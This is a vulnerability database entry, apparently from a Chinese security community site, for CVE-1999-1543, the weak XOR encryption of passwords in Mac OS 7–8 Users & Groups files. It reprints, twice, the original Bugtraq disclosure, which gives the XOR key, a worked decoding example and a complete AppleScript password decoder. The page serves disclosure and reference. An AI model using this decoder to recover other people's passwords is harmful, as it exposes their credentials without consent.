CVE-1999-1543
CVSS4.6
发布时间 :1999-07-10 00:00:00
修订时间 :2016-10-17 22:05:48
NMCOES    

[原文]MacOS uses weak encryption for passwords that are stored in the Users & Groups Data File.


[CNNVD]MacOS弱密码加密漏洞(CNNVD-199907-013)

        MacOS存在漏洞。MacOS运用弱加密术对存于用户&组数据文件中的密码加密。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os:8.0Apple Mac OS 8.0
cpe:/o:apple:mac_os:8.1Apple Mac OS 8.1
cpe:/o:apple:mac_os:7.6.1Apple Mac OS 7.6.1
cpe:/o:apple:mac_os:7.5.3Apple Mac OS 7.5.3
cpe:/o:apple:mac_os:8.6Apple Mac OS 8.6
cpe:/o:apple:mac_os:7.6Apple Mac OS 7.6
cpe:/o:apple:mac_os:8.5Apple Mac OS 8.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1543
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1543
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-013
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=93188174906513&w=2
(UNKNOWN)  BUGTRAQ  19990710 MacOS system encryption algorithm
http://marc.info/?l=bugtraq&m=93736667813924&w=2
(UNKNOWN)  BUGTRAQ  19990914 MacOS system encryption algorithm 3
http://www.securityfocus.com/bid/519
(VENDOR_ADVISORY)  BID  519

- 漏洞信息

MacOS弱密码加密漏洞
中危 设计错误
1999-07-10 00:00:00 2006-04-07 00:00:00
本地  
        MacOS存在漏洞。MacOS运用弱加密术对存于用户&组数据文件中的密码加密。

- 公告与补丁

        Suggested by Vinnie Moscaritolo:
        A good fix is to not depend on passwords. There is a free plug-in for AppleShare- IP available as Sample code from Apple's Developer Support Group that works around this problem. It is called PGPuam.
        PGPuam is available in our free tools section.

- 漏洞信息 (19417)

Apple Mac OS <= 8 8.6 Weak Password Encryption Vulnerability (EDBID:19417)
osX local
1999-07-10 Verified
0 Dawid adix Adamski
N/A [点击下载]
source: http://www.securityfocus.com/bid/519/info

The encryption algorithm in MacOS system is simple and the password can be easily decoded.

Password is stored in Users & Groups Data File in Preferences folder. Offset is different on each system and depends on Users & Groups configuration, but it always lie after owner's username. It's not so difficult to find it using a hex editor, even if we don't know owner's username.

Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1

AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)

aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH

An example:
Let's take OO 04 06 18 0D 0A 19 0B

00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; O2H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y

tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5

Dawid adix Adamski <adixx@FRIKO4.ONET.PL> wrote an apple script to break passwords.

--------CUT HERE--------
(* MacOS Pass 2.1 by adix 15.06.99; Apple Script English *)
global lbin, bit1, bit2, bitk
set hex1 to text returned of (display dialog "Enter encrypted password
(hex): " default answer "" buttons {" Ok "} default button " Ok " with icon
stop)
set Alicia to
"0111001101110000011000110110011101110100011100000111001001101011"
set pass to ""
set lbin to ""
set razem to ""
set i to 1
set skok to 0
set ile to count items in hex1
if ile = 0 or ile = 1 then
set pass to ""
else
repeat until (i > (ile - 1))
set kodascii to 0
set razem to ""
set zn to items (i) thru (i + 1) in hex1
set lbin to hex2bin(zn)
repeat with a from 1 to 8
set bit1 to item (a + skok) of Alicia
xor(a)
set razem to {razem & bitk} as string
if i < 2 then
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
end if
end repeat
if i < 2 then
set pass to {pass & (ASCII character kodascii)}
else
set zn to items (i - 2) thru (i - 1) in hex1
set lbin to hex2bin(zn)
repeat with a from 1 to 8
set bit1 to item a of razem
xor(a)
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
end repeat
set pass to {pass & (ASCII character kodascii)}
end if
set skok to skok + 8
set i to i + 2
end repeat
end if
display dialog "Password: " & pass & return & return & "by adix" buttons
{" Ok "} default button " Ok " with icon note
on hex2bin(zn)
set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110",
"0111", "1000", "1001", "1010", "1011", "1100", -
"1101", "1110", "1111"}
set t2hex to "0123456789ABCDEF"
set bin to ""
repeat with j in zn
set t1 to j as string
repeat with i from 1 to (count items in t2hex)
if ((item i in t2hex) = t1) then
set temp to (item i in temphex)
exit repeat
end if
end repeat
set bin to {bin & temp} as string
end repeat
return (bin)
end hex2bin
on xor(a)
set bit2 to item a in lbin
if bit1 = bit2 then
set bitk to "0"
else
set bitk to "1"
end if
end xor 
		

- 漏洞信息

4993
Mac OS Users & Groups Data File Encryption Weakness
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

MacOS contains a flaw that may lead to an unauthorized password exposure. The password is stored in Users & Groups Data File in Preferences folder. The encryption used to protect the password is trivial to break, potentially exposing user passwords.

- 时间线

1999-07-10 Unknow
1999-07-10 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

MacOS Weak Password Encryption Vulnerability
Design Error 519
No Yes
1999-07-10 12:00:00 2009-07-11 12:56:00
Posted to bugtraq on July 10, 1999 by Dawid adix Adamski <adixx@FRIKO4.ONET.PL>. Additional information from Vinnie Moscaritolo <vinnie@apple.com>.

- 受影响的程序版本

Apple Mac OS 8 8.6
Apple Mac OS 8 8.5
Apple Mac OS 8 8.1
Apple Mac OS 8 8.0
Apple Mac OS 7 7.6.1
Apple Mac OS 7 7.6
Apple Mac OS 7 7.5.3

- 漏洞讨论

The encryption algorithm in MacOS system is simple and the password can be easily decoded.

Password is stored in Users &amp; Groups Data File in Preferences folder. Offset is different on each system and depends on Users &amp; Groups configuration, but it always lie after owner's username. It's not so difficult to find it using a hex editor, even if we don't know owner's username.

Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1

AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)

aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH

An example:
Let's take OO 04 06 18 0D 0A 19 0B

00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; O2H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y

tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5

copied verbatim from a post to bugtraq by Dawid adix Adamski &lt;adixx@FRIKO4.ONET.PL&gt; on July 10, 1999

- 漏洞利用

Dawid adix Adamski &lt;adixx@FRIKO4.ONET.PL&gt; wrote an apple script to break passwords.

--------CUT HERE--------
(* MacOS Pass 2.1 by adix 15.06.99; Apple Script English *)
global lbin, bit1, bit2, bitk
set hex1 to text returned of (display dialog "Enter encrypted password
(hex): " default answer "" buttons {" Ok "} default button " Ok " with icon
stop)
set Alicia to
"0111001101110000011000110110011101110100011100000111001001101011"
set pass to ""
set lbin to ""
set razem to ""
set i to 1
set skok to 0
set ile to count items in hex1
if ile = 0 or ile = 1 then
set pass to ""
else
repeat until (i &gt; (ile - 1))
set kodascii to 0
set razem to ""
set zn to items (i) thru (i + 1) in hex1
set lbin to hex2bin(zn)
repeat with a from 1 to 8
set bit1 to item (a + skok) of Alicia
xor(a)
set razem to {razem &amp; bitk} as string
if i &lt; 2 then
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
end if
end repeat
if i &lt; 2 then
set pass to {pass &amp; (ASCII character kodascii)}
else
set zn to items (i - 2) thru (i - 1) in hex1
set lbin to hex2bin(zn)
repeat with a from 1 to 8
set bit1 to item a of razem
xor(a)
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
end repeat
set pass to {pass &amp; (ASCII character kodascii)}
end if
set skok to skok + 8
set i to i + 2
end repeat
end if
display dialog "Password: " &amp; pass &amp; return &amp; return &amp; "by adix" buttons
{" Ok "} default button " Ok " with icon note
on hex2bin(zn)
set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110",
"0111", "1000", "1001", "1010", "1011", "1100", -
"1101", "1110", "1111"}
set t2hex to "0123456789ABCDEF"
set bin to ""
repeat with j in zn
set t1 to j as string
repeat with i from 1 to (count items in t2hex)
if ((item i in t2hex) = t1) then
set temp to (item i in temphex)
exit repeat
end if
end repeat
set bin to {bin &amp; temp} as string
end repeat
return (bin)
end hex2bin
on xor(a)
set bit2 to item a in lbin
if bit1 = bit2 then
set bitk to "0"
else
set bitk to "1"
end if
end xor

- 解决方案

Suggested by Vinnie Moscaritolo:

A good fix is to not depend on passwords. There is a free plug-in for AppleShare- IP available as Sample code from Apple's Developer Support Group that works around this problem. It is called PGPuam.

PGPuam is available in our free tools section.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站